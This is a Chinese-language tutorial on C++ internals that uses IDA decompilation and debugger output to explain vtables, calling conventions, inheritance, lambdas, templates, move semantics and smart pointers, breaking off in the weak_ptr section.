#include<iostream>
using namespace std;

class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
};

class A : public Base{
public:
virtual void fooa(){
cout<<"Base::fooa() is called"<<endl;
}
virtual void foob(){
cout<<"Base::fooa() is called"<<endl;
}
};

class B : public Base{
public:
virtual void fooa(){
cout<<"Base::fooa() is called"<<endl;
}
virtual void foob(){
cout<<"Base::fooa() is called"<<endl;
}
};

int main(void){
A *a = new A();
B *b = new B();
a->foo1();
a->foo2();
b->fooa();
b->foob();
a->fooa();
a->foob();
}
  • 当一个类继承带有虚函数的类时,它会先将父类的虚表复制一份,然后将自己的虚表添加到后面:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rbx
B *v4; // rbx
A *a; // [rsp+0h] [rbp-20h]
B *b; // [rsp+8h] [rbp-18h]

v3 = (A *)operator new(8uLL);
v3->_vptr_Base = 0LL;
A::A(v3);
a = v3;
v4 = (B *)operator new(8uLL);
v4->_vptr_Base = 0LL;
B::B(v4);
b = v4;
(*a->_vptr_Base)(a, argv);
(*((void (__fastcall **)(A *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(B *))b->_vptr_Base + 3))(b);
(*((void (__fastcall **)(B *))b->_vptr_Base + 4))(b);
(*((void (__fastcall **)(A *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(A *))a->_vptr_Base + 4))(a);
return 0;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
.data.rel.ro:0000000000003D30 D4 12 00 00 00 00 00 00       off_3D30 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D30 ; Base::foo1(void)
.data.rel.ro:0000000000003D38 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D40 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CF8 D4 12 00 00 00 00 00 00       off_3CF8 dq offset _ZN4Base4foo1Ev      ; DATA XREF: A::A(void)+18↑o
.data.rel.ro:0000000000003CF8 ; Base::foo1(void)
.data.rel.ro:0000000000003D00 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D08 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D10 7C 13 00 00 00 00 00 00 dq offset _ZN1A4fooaEv ; A::fooa(void)
.data.rel.ro:0000000000003D18 B4 13 00 00 00 00 00 00 dq offset _ZN1A4foobEv ; A::foob(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CC0 D4 12 00 00 00 00 00 00       off_3CC0 dq offset _ZN4Base4foo1Ev      ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003CC0 ; Base::foo1(void)
.data.rel.ro:0000000000003CC8 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003CD0 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003CD8 EC 13 00 00 00 00 00 00 dq offset _ZN1B4fooaEv ; B::fooa(void)
.data.rel.ro:0000000000003CE0 24 14 00 00 00 00 00 00 dq offset _ZN1B4foobEv ; B::foob(void)

调用约定

C/C++ 函数调用约定,主要是对以下两个方面进行了约定:

  • 当参数个数多于一个时,按照什么顺序把参数压入堆栈(参数的入栈顺序)
  • 函数调用后,由谁来把堆栈恢复原状

常见的调用方式有:

  • C 语言:__cdecl __stdcall __fastcall naked __pascal
  • C++ 语言:__cdecl __stdcall __fastcall naked __pascal __thiscall

下面就分别介绍这几种调用方式:

__stdcall:StandardCall 的缩写,是C++的标准调用方式

  • 使用 PASCAL 宏,WINAPI 宏和 CALLBACK 宏来指定函数的调用方式为 stdcall
1
int _stdcall function(int a, int b); // 明确指定用stdcall
  • 参数从右向左依次压入堆栈
  • 由被调用函数自己来恢复堆栈,称为自动清栈
  • 函数名自动加前导下划线,后面紧跟着一个@,其后紧跟着参数的大小

__cdecl:C Declaration 的缩写,cdecl 调用方式又称为C调用方式,是32位C程序默认的调用方式

1
2
int function(int a, int b) // 不加修饰符就是cdecl
int _cdecl function(int a, int b) // 明确指定用cdecl
  • 参数从右向左依次压入堆栈
  • 由调用者恢复堆栈,称为手动清栈
  • 函数名自动加前导下划线

__fastcall:一种快速调用方式(通过 CPU 寄存器来传递参数),是64位C程序默认的调用方式

1
int fastcall function(int a, int b); // 明确指定用fastcall
  • 前6个参数分别放入 RDI,RSI,RDX,RCX,R8,R9
  • 其余参数从右向左依次压入堆栈
  • 如果需要用栈传参,则使用手动清栈

__thiscall:唯一一个不能明确指明的函数修饰,因为 thiscall 不是关键字,是C++类成员函数默认的调用约定

  • 由于成员函数调用还有一个 this 指针,因此必须特殊处理
  • this 指针将作为第一个参数传入,其余参数处理和 __cdecl/__thiscall 一样(取决于程序是32位还是64位)

__stdcall__cdecl 的不同之处:

  • stdcall 方式是在函数返回时利用 retn x 指令清除栈中的参数
  • cdecl 方式是函数返回后,由调用函数者修改 esp 的值来清除栈中的参数

多重继承

一个派生类如果只继承一个基类,称作单继承,那么如果继承了多个基类,就称作多继承

1
class C:public A,public B{};

1685892862095

  • 优点:派生类通过多重继承,可以得到多个基类的数据和方法,更大程度的实现了代码复用
  • 缺点:可能会导致某个类被重复构造,可能得到重复的基类数据

案例:多重继承导致重复基类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public B, public C{
public:
D(int data):B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
1
2
3
4
5
A()
B()
A()
C()
D()
  • A被构造了两次

虚继承

在继承方式前面加上 virtual 关键字就是虚继承

1
class B:virtual public A{};
  • 如果虚继承类拥有派生类,则构造虚基类的任务将会交给派生类完成

案例:虚继承解决重复基类的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :virtual public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public B, public C{
public:
D(int data):A(data),B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
  • PS:由于B虚继承A,因此派生类D需要完成虚基类A的构造
1
2
3
4
A()
B()
C()
D()

案例:虚基类的构造问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :public B{
public:
C(int data):A(data),B(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public C{
public:
D(int data):A(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
  • 由于B虚继承A,因此派生类CD都有可能完成虚基类A的构造
  • 通常由最后一级的派生类通常负责构造虚基类

虚基类的内存布局:

1
2
3
4
5
00:00000x55555556aea0 ◂— 0x0
01:00080x55555556aea8 ◂— 0x21 /* '!' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557cb8 ◂— 0x555555557cb8
03:00180x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:00200x55555556aec0 ◂— 0xa0000000d /* '\r' */
  • 虚继承的子类都有一个虚基类指针,其指向虚基类表(虚基类指针和虚函数的虚指针不是同一个东西)
  • 虚继承底层实现原理与编译器相关,一般通过虚基类指针和虚基类表实现
1
2
3
4
5
6
7
8
pwndbg> telescope 0x55555556aea0
00:00000x55555556aea0 ◂— 0x0
01:00080x55555556aea8 ◂— 0x31 /* '1' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557c28 ◂— 0x0
03:00180x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:00200x55555556aec0 ◂— 0xd /* '\r' */
05:00280x55555556aec8 —▸ 0x555555557c40 —▸ 0x55555555536c (A::fun()) ◂— endbr64
06:00300x55555556aed0 ◂— 0xa /* '\n' */
  • 这里的 0x555555557c40 就是A类的虚指针,而 0x555555557c28 是D类的虚基类指针

匿名函数 Lambda

lambda 函数是一种匿名函数,它表示一个接受参数并返回一个值的函数

lambda 函数的语法如下:

1
[capture](parameters) -> return_type { function_body }

测试样例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>

typedef int (*lambda_ta)(int);
typedef int (*lambda_tb)(int,int);
typedef double (*lambda_tc)(double);

lambda_ta lambdaA = [](int a) -> int {
return a * 2;
};

lambda_tb lambdaB = [](int a,int b) -> int {
return a * b;
};

int main() {
int x0 = 5;
int x1 = lambdaA(x0);
int x2 = lambdaB(x0,x1);
double y0 = x1 + x2;
double y1 = [](double a) -> double {
return a * 2;
}(y0);

return 0;
}
  • 在底层,局部匿名函数和全局匿名函数的实现不同
1
2
3
4
x0 = 5;
x1 = lambdaA(5);
y0 = (double)(x1 + lambdaB(5, x1));
main::{lambda(double)#1}::operator()(&__closure, y0);
  • 匿名函数和普通函数本质上的区别就是:匿名函数不能通过函数名来调用
  • 调用全局匿名函数其实是调用全局变量上对应的函数指针:
1
2
3
4
5
6
7
8
.data:0000000000004010                               public lambdaA
.data:0000000000004010 ; lambda_ta lambdaA
.data:0000000000004010 1A 12 00 00 00 00 00 00 lambdaA dq offset _ZN7lambdaAMUliE_4_FUNEi
.data:0000000000004010 ; DATA XREF: main+22↑r
.data:0000000000004018 public lambdaB
.data:0000000000004018 ; lambda_tb lambdaB
.data:0000000000004018 55 12 00 00 00 00 00 00 lambdaB dq offset _ZN7lambdaBMUliiE_4_FUNEii
.data:0000000000004018 ; DATA XREF: main+33↑r
  • 而局部匿名函数本质上是对 () 的重载
  • 调用局部匿名函数其实是调用对应的重载函数:
1
2
3
4
5
6
double __cdecl main::{lambda(double)#1}::operator()(
const main::$256B327EE357AF9FCD813216707B60D5 *const __closure,
double a)
{
return a + a; /* PS:编译器对这里进行了优化 */
}

泛型编程

模板是泛型编程的基础,泛型编程即以一种独立于任何特定类型的方式编写代码

模板有两类:函数模板,类模板

函数模板

不规定某个函数的传参类型或者返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <string>

using namespace std;

template <class T>
void Swap(T &num1, T& num2){
T tmp = num1;
num1 = num2;
num2 = tmp;
}

int main() {
int a = 10, b = 20;
Swap(a,b); /* 函数模板实例化 */
cout << "a :" << a << "b :" << b << endl;

float c = 10.55f, d = 3.14f;
Swap(c, d); /* 函数模板实例化 */
cout << "c :" << c << "d :" << d << endl;
}
  • 函数模板不规定参数类型,返回值类型
  • 在编译时,编译器会根据实际传参来创建不同类型的副本,这个过程被称为函数模板实例化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
a = 10;
b = 20;
Swap<int>(&a, &b); /* 函数模板实例化(创建int类型的副本) */
v3 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_2005);
v4 = std::ostream::operator<<(v3, (unsigned int)a);
v5 = std::operator<<<std::char_traits<char>>(v4, &unk_2009);
v6 = std::ostream::operator<<(v5, (unsigned int)b);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
c = 10.55;
d = 3.1400001;
Swap<float>(&c, &d); /* 函数模板实例化(创建float类型的副本) */
v7 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_200D);
v8 = std::ostream::operator<<(v7, *(double *)_mm_cvtsi32_si128(LODWORD(c)).m128i_i64);
v9 = std::operator<<<std::char_traits<char>>(v8, &unk_2011);
v10 = std::ostream::operator<<(v9, *(double *)_mm_cvtsi32_si128(LODWORD(d)).m128i_i64);
std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);

1686123247822

下面是一个特殊的案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>
#include <cassert>
using namespace std;

int add(int a,int b){
return a+b;
}

typedef int (*lambda_t)(int,int);
lambda_t sub = [](int a,int b) -> int {
return a-b;
};

template <typename Fn>
void func(Fn const &fn){
int a = 10;
int b = 5;
cout << fn(a,b) << endl;
}

int main(){
func(add);
func([](int a,int b) -> int {
return a * b;
});
func(sub);
}
  • 函数模板和类模板都可以将 “函数指针” 当做类型
1
2
3
func<int ()(int,int)>((int (*)(int, int))add); /* 普通函数 */
func<main::{lambda(int,int)#1}>(&fn); /* 局部匿名函数 */
func<int (*)(int,int)>(&sub); /* 全局匿名函数 */

类模板

不规定该类中某个函数的传参类型或返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
#include <string>
#include <cassert>

namespace mzt {
template<class T>
class vector {
public:
vector() : _a(nullptr),_size(0),_capacity(0){}
void push_back(const T& data) {
if (_capacity == _size) {
size_t newcapacity = _capacity == 0 ? 4 : _capacity * 2;
T* tmp = new T[newcapacity];
assert(tmp);
_a = tmp;
_capacity = newcapacity;
}
_a[_size++] = data;
}
T& operator[](size_t pos) {
assert(pos < _size);
return _a[pos];
}
size_t getsize() {
return _size;
}
private:
T* _a;
size_t _size;
size_t _capacity;
};
}

using namespace std;

int main() {
mzt::vector<int> a; /* 类模板实例化 */
a.push_back(1);
a.push_back(2);
mzt::vector<double> b; /* 类模板实例化 */
b.push_back(3.0);
b.push_back(4.0);
}
  • 类模板实例化与函数模板实例化不同
  • 类模板实例化需要在类模板名字后跟 <> 指定类型(函数模板实例化也可以用 <> 指定类型,即使没有,编译器也会自动识别类型)
1
2
3
4
5
6
7
8
9
10
mzt::vector<int>::vector(&a); /* 类模板实例化 */
LODWORD(b._a) = 1;
mzt::vector<int>::push_back(&a, (const int *)&b);
LODWORD(b._a) = 2;
mzt::vector<int>::push_back(&a, (const int *)&b);
mzt::vector<double>::vector(&b); /* 类模板实例化 */
data = 3.0;
mzt::vector<double>::push_back(&b, &data);
data = 4.0;
mzt::vector<double>::push_back(&b, &data);

模板特例化

在原模板类的基础上,针对特殊类型所进行特殊化的实现方式

模板特化中分为:函数模板特化,类模板特化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
#include <cstring>

using namespace std;

bool IsEqual(int left, int right) {
return left == right;
}

template<class T>
bool IsEqual(const T& left, const T& right) {
return left == right;
}

template< >
bool IsEqual<const char *>(const char* const& left,
const char* const& right) {
return strcmp(left, right) == 0;
}

int main(){
int a = 0;
int b = 1;
const char* p1 = "hello";
const char* p2 = "hello";
bool ret;

ret = IsEqual(a, b);
ret = IsEqual<int>(a, b);
ret = IsEqual<const char*>(p1, p2);
}
1
2
3
4
5
6
7
v4 = 0;
v5 = 1;
v6 = "hello";
v7[0] = "hello";
IsEqual(0, 1); /* 调用普通函数(最优先) */
IsEqual<int>(&v4, &v5); /* 调用模板函数 */
IsEqual<char const*>(&v6, v7); /* 调用特例化的模板函数(次优先) */
  • 如果遇到相同普通函数(函数名和类型都相同),编译器则会优先调用普通函数(最优先)
  • 如果指定类型匹配,特例化的模板函数会比普通的模板函数优先调用(次优先)

类型形参 & 非类型形参

模板参数分类:类型形参、非类型形参

  • 类型形参:出现在模板参数列表中,跟在 class 或者 typename 之后的参数类型名称
  • 非类型形参:就是用一个常量作为类(函数)模板的一个参数,在类(函数)模板中可将该参数当成常量来使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <cassert>

namespace mzt {
template<class T = int, size_t N = 10> /* T为类型形参,N为非类型形参 */
class Array {
public:
T& operator[](size_t pos) { /* 重载[] */
return arr[pos];
}
private:
T arr[N];
};
}

int main(){
mzt::Array< > a; /* 不提供模板参数,使用缺省值 */
a[0]=1;
a[1]=2;
return 0;
}
1
2
*mzt::Array<int,10ul>::operator[](&a, 0LL) = 1;
*mzt::Array<int,10ul>::operator[](&a, 1uLL) = 2;

右值引用

左值 & 右值

  • 左值是可以放在赋值号左边可以被赋值的值,左值必须要在内存中有实体
    • 当左值被赋值时,左值本身保留
  • 右值当在赋值号右边取出值赋给其他变量的值,右值可以在内存也可以在CPU寄存器
    • 当右值被赋值时,右值会被释放
1
2
3
4
5
6
7
8
9
10
11
12
13
#include <iostream>
#include <memory>
using namespace std;

int main(){
int a = 10;
int &b = a; /* 左值引用(b相当于a的别名) */
int &&c = 20; /* 右值引用(c相当于20的别名) */

cout << &a << ":" << a << endl;
cout << &b << ":" << b << endl;
cout << &c << ":" << c << endl;
}
1
2
3
0x7ffc2d216c30:10
0x7ffc2d216c30:10
0x7ffc2d216c34:20

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
v13 = 10; /* int a = 10 */
v15 = &v13; /* int &b = a */
v14 = 20; /* int &&c = 20 */
v16 = &v14;
v3 = std::ostream::operator<<(&std::cout, &v13);
v4 = std::operator<<<std::char_traits<char>>(v3, ":");
v5 = std::ostream::operator<<(v4, v13);
std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
v6 = std::ostream::operator<<(&std::cout, v15);
v7 = std::operator<<<std::char_traits<char>>(v6, ":");
v8 = std::ostream::operator<<(v7, *v15);
std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
v9 = std::ostream::operator<<(&std::cout, v16);
v10 = std::operator<<<std::char_traits<char>>(v9, ":");
v11 = std::ostream::operator<<(v10, *v16);
std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
  • 在底层,右值引用相当于是赋值与左值引用的结合

std::move

std::move 唯一的功能是将一个左值强制转化为右值引用

1
2
3
4
template <class _Ty>
inline _CONST_FUN typename remove_reference<_Ty>::type&& move(_Ty&& _Arg) _NOEXCEPT {
return (static_cast<typename remove_reference<_Ty>::type&&>(_Arg));
}
  • 如果是左值,就通过 static_cast 将传进来的参数强转为右值并返回
  • 如果是右值,直接返回
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <iostream>
#include <utility>
#include <vector>
#include <string>
using namespace std;

int main(){
std::string s = "Hello";
std::string sleft;
std::string sright;

sleft = s; /* 左值赋值 */
std::cout << s << endl;
std::cout << sleft << endl;
sright = std::move(s); /* 右值赋值 */
std::cout << s << endl;
std::cout << sright << endl;
}
1
2
3
4
Hello
Hello

Hello
  • 左值赋值:字符串 s 仍然存在
  • 右值赋值:字符串 s 被置空

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
std::allocator<char>::allocator(&v9, argv, envp);
std::string::basic_string<std::allocator<char>>(v10, "Hello", &v9);
std::allocator<char>::~allocator(&v9);
std::string::basic_string(v11);
std::string::basic_string(v12);
std::string::operator=(v11, v10);
v3 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
v4 = std::operator<<<char>(&std::cout, v11);
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = std::move<std::string &>(v10);
std::string::operator=(v12, v5);
v6 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
v7 = std::operator<<<char>(&std::cout, v12);
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
std::string::~string(v12);
std::string::~string(v11);
std::string::~string(v10)
  • std::move 在底层会直接返回参数的原始值,真正置空字符串 s 的操作是 std::string::operator=() 函数
1
2
3
4
__int64 __fastcall std::move<std::string &>(__int64 a1)
{
return a1;
}
  • 仔细分析可以发现左值赋值和右值赋值调用的 std::string::operator=() 函数不一样
1
2
.text:0000000000002509 E8 E2 FC FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_ ; std::string::operator=(std::string const&)
.text:0000000000002509
1
2
.text:0000000000002577 E8 84 FD FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_ ; std::string::operator=(std::string&&)
.text:0000000000002577

拷贝构造函数 & 移动构造函数

如果想用其它对象初始化一个同类的新对象,只能借助类中的拷贝构造函数

  • 其实现原理是为新对象复制一份和其它对象一模一样的数据
  • 当类中拥有指针类型的成员变量时,拷贝构造函数中需要以深拷贝的方式复制该指针成员

移动构造函数使用右值引用形式的参数

  • 在此构造函数中,num 指针变量采用的是浅拷贝的复制方式
  • 在函数内部置空了 d.num(为了避免 “同一块对空间被释放多次”)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
using namespace std;

class demo{
public:
demo():num(new int(1)){
cout<<"construct!"<<endl;
}
demo(const demo &d):num(new int(*d.num)){ /* 拷贝构造函数(深拷贝) */
cout<<"copy construct!"<<endl;
}
demo(demo &&d):num(d.num){ /* 移动构造函数 */
d.num = NULL;
cout<<"move construct!"<<endl;
}
~demo(){
cout<<"class destruct!"<<endl;
}
int *num;
};

demo get_demo(){
return demo();
}

int main(){
demo a = get_demo();
demo b = a;
demo c = move(a);
return 0;
}

IDA 分析:

1
2
3
4
5
6
7
get_demo((demo *)v5);
demo::demo((demo *)v6, (const demo *)v5); /* 拷贝构造 */
v3 = std::move<demo &>(v5);
demo::demo(v7, v3); /* 移动构造 */
demo::~demo((demo *)v7);
demo::~demo((demo *)v6);
demo::~demo((demo *)v5);
1
2
3
4
5
6
7
8
9
10
11
void __fastcall demo::demo(demo *this, const demo *a2)
{
_DWORD *v2; // rax
__int64 v3; // rax

v2 = (_DWORD *)operator new(4uLL);
*v2 = **(_DWORD **)a2;
*(_QWORD *)this = v2;
v3 = std::operator<<<std::char_traits<char>>(&std::cout, "copy construct!");
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
}
1
2
3
4
5
6
7
8
9
__int64 __fastcall demo::demo(_QWORD *a1, _QWORD *a2)
{
__int64 v2; // rax

*a1 = *a2;
*a2 = 0LL;
v2 = std::operator<<<std::char_traits<char>>(&std::cout, "move construct!");
return std::ostream::operator<<(v2, &std::endl<char,std::char_traits<char>>);
}

智能指针

智能指针 (Smart Pointer) 是一种在 C++ 中用于管理动态分配的内存的类,它提供了一种灵活的方式来管理对象的生命周期,可以避免资源泄漏和内存错误

auto_ptr

当对象过期时,其析构函数将自动使用 delete 来释放内存:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#include <iostream>
#include <memory>
using namespace std;

class Auto {
public:
Auto() { cout << "Auto create" << endl; }
~Auto() { cout << "Auto delete" << endl; }
int key1 = 10;
int key2 = 20;
};

int main(){
auto_ptr<Auto> test(new Auto);
int key1 = (*test).key1;
int key2 = test->key2;
int key3 = key1 + key2;
cout << key3 << endl;
return 0;
}
  • 栈上的对象会在当前语句块结束时释放,堆上的对象需要使用 delete 释放
  • auto_ptr 属于栈上的对象,在它的析构函数中会尝试 delete 目标对象

IDA 分析如下:

1
2
3
4
5
6
7
8
v5 = (Auto *)operator new(8uLL);
Auto::Auto(v5); /* Auto的构造函数 */
std::auto_ptr<Auto>::auto_ptr(v8, v5); /* auto_ptr的构造函数 */
v6 = *(_DWORD *)std::auto_ptr<Auto>::operator*(v8);
v7 = v6 + *(_DWORD *)(std::auto_ptr<Auto>::operator->(v8) + 4);
v3 = std::ostream::operator<<(&std::cout, v7);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
std::auto_ptr<Auto>::~auto_ptr(v8); /* auto_ptr的析构函数 */
  • auto_ptr 的析构函数中会自动释放 Auto(传入对象):
1
2
3
4
5
6
7
8
9
10
11
void __fastcall std::auto_ptr<Auto>::~auto_ptr(Auto **a1)
{
Auto *v1; // rbx

v1 = *a1;
if ( *a1 )
{
Auto::~Auto(*a1);
operator delete(v1, 8uLL);
}
}
  • auto_ptr 创建的对象仍然具有指针的性质,其原因是 auto_ptr*-> 等符号进行了重构
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator*(__int64 a1)
{
return *(_QWORD *)a1;
}
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator->(__int64 a1)
{
return *(_QWORD *)a1;
}
  • PS:对于 *-> 的重构只是实现了解引用而已,不负责具体的偏移

unique_ptr

unique_ptrauto_ptr 的用法几乎一样,另外添加了如下几个特性:

  • 基于排他所有权模式:两个指针不能指向同一个资源
  • 无法进行左值 unique_ptr 复制构造,也无法进行左值复制赋值操作,但允许临时右值赋值构造和赋值
  • 在 STL 容器中使用 unique_ptr,不允许直接赋值
  • 支持对象数组的内存管理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>
#include <memory>
using namespace std;

int main(){
unique_ptr<string> p1(new string("11111111"));
unique_ptr<string> p2(new string("22222222"));

//p1 = p2; // 禁止左值赋值
//unique_ptr<string> p3(p2); // 禁止左值赋值构造

cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;

unique_ptr<string> p3(std::move(p2));
p2 = std::move(p1); // 使用move把左值转成右值就可以赋值了,效果和auto_ptr赋值一样

cout << "-------------------" << endl;
cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;
cout << "p3:" << p3.get() << endl;
}
1
2
3
4
5
6
p1:0x559625bfdeb0
p2:0x559625bfdee0
-------------------
p1:0
p2:0x559625bfdeb0
p3:0x559625bfdee0

IDA 分析如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 std::allocator<char>::allocator(v27, argv, envp);
v23 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v23, "11111111", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v25, v23); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);
std::allocator<char>::allocator(v27, v23, v3);
v24 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v24, "22222222", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v26, v24); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);

......

v10 = std::move<std::unique_ptr<std::string> &>(v26); /* 把左值转成右值 */
std::unique_ptr<std::string>::unique_ptr(v27, v10); /* unique_ptr的构造函数 */
v11 = std::move<std::unique_ptr<std::string> &>(v25); /* 把左值转成右值 */
std::unique_ptr<std::string>::operator=(v26, v11);

......

std::unique_ptr<std::string>::~unique_ptr(v27);
std::unique_ptr<std::string>::~unique_ptr(v26);
std::unique_ptr<std::string>::~unique_ptr(v25)

shared_ptr

shared_ptr 基于非排他所有权模式:允许多个指针指向同一个资源

  • 当复制或拷贝时,引用计数加 “1”
  • 当智能指针析构时,引用计数减 “1”
  • 如果计数为 “0”,代表已经没有指针指向这块内存,那么就释放它
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include <iostream>
#include <memory>
using namespace std;

void deleteStr(string* p) { /* 允许自定义析构函数 */
cout << *p << endl;
}

int main(){
string* str = new string("11111111");
std::shared_ptr<string> p1(str, deleteStr);
std::shared_ptr<string> p2(p1);
std::shared_ptr<string> p3(p2);

cout << "p1 count = " << p1.use_count() << endl;
cout << "p2 count = " << p2.use_count() << endl;
cout << "p3 count = " << p3.use_count() << endl;

p1 = NULL;
p2 = NULL;

cout << "p1 count = " << p1.use_count() << endl;
cout << "p2 count = " << p2.use_count() << endl;
cout << "p3 count = " << p3.use_count() << endl;

p3 = NULL;
cout << "22222222" << endl;

return 0;
}
1
2
3
4
5
6
7
8
p1 count = 3
p2 count = 3
p3 count = 3
p1 count = 0 /* p1被置空 */
p2 count = 0 /* p2被置空 */
p3 count = 1 /* shared_ptr的计数器为"1" */
11111111 /* 当shared_ptr的计数器为"0"时,调用析构函数 */
22222222

weak_ptr

weak_ptr 是为配合 shared_ptr 而引入的一种智能指针,它只可以从一个 shared_ptr 或另一个 weak_ptr 对象构造

weak_ptr 提供的是一个弱引用:

  • 弱引用不更改引用计数,类似普通指针

shared_ptr 提供的是一个强引用:

